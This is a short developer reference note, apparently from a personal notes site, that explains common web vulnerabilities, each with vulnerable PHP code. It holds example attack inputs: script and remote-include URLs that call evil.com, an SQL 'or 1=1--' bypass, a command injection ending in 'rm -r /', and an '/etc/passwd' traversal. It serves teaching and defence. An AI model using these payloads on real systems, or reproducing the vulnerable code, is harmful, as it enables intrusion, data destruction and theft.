ruk·si

🧑‍💻 Web Server Exploits

Updated at 2012-11-02 18:11

This note contains basic web server exploits.

Shortly how to prevent most exploits:

  • Simplify all external data you use.
  • Reduce the amount of external data you use to absolute minimum.
  • All external data should be validated using whitelists, not with blacklists.

Cross-site scripting (XSS): attacker gets user to load malicious code when the user is accessing a system. Most used security vulnerability on the web. If attacker gets an user to load JavaScript file on a web site, there is nothing you can do to deny attacker from getting full access. Usually caused by insufficient sanitization of user input data.

$nickname= $_GET['nickname'];
echo "<div>Welcome $nickname!</div>\n";
www.example.com/?nickname=<script src="evil.com/magic.js"></script>

Cross-site request forgery (CSRF): attacker issues unauthorized commands to a system by redirecting a logged in user. Usually happens when cookies are used to save session, but each page load does not contain a secret that validates that each URL access comes from the real user, not from an external redirect.

<img src="example.com/transfer?amount=900&to=evilAccount#" width="0" height="0">

Remote code execution: executing code from a remote source. Basically same as XSS but on server side. Usually caused by insufficient sanitization of user input data.

<? include($_GET["module"].".php"); ?>
www.example.com/?module=evil.com/maliciousscript

SQL injection: attacker gets to execute own SQL statements or modify used SQL logic in the database. Usually caused by insufficient sanitization of user input data.

$username = $_GET['username'];
$password = $_GET['password'];
mysql_query("
    SELECT *
    FROM users
    WHERE username = '$username'
    AND password = '$password'
;");
www.example.com/?username=tommi&password=secret' or 1=1--

Command injection: attacker gets system to execute commands in the run-time environment. Usually caused by insufficient sanitization of user input data.

echo shell_exec('cat '.$_GET['filename']);
www.example.com/?filename=readme.txt;rm -r /

Code injection: attacker gets to execute code snippets in the run-time environment. Usually caused by using code evaluators on user input data. Always verify the origin and integrity of any external code, or even better, do not use evaluators.

$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
www.example.com/?arg=1; phpinfo()

Directory traversal: attacker gains access to hidden server files by using path traversal syntax e.g. ../ to go to parent directory. Usually caused by insufficient sanitization of user inputted paths like file names.

include("./" . $_GET['page']);
www.example.com/?page=../../../../../../../../etc/passwd

Redirect attack: attacker can somehow affect where current user is being redirected. For example, attacker could host an identical login page on their own site to get login details. Usually caused by wrongly using user input to redirect user.

$redirectUrl = $_GET['url'];
header("Location: $redirectUrl");
www.example.com/?url=evil.com/sploitCode.php

Failure to restrict access: Keeping scripts hidden does not prevent attacks, it only slows them. You need to confirm that the user is authenticated to use critical functions or files.

www.example.com/admins/editUser.php

MIME type mismatch: attacker gets user's browser to load a file X as HTML even though it is not handles as a HTML file in the server. File X can then contain malicious JavaScript to be executed. IE9 and under has this behaviour.

example.com/search/important.doc;.html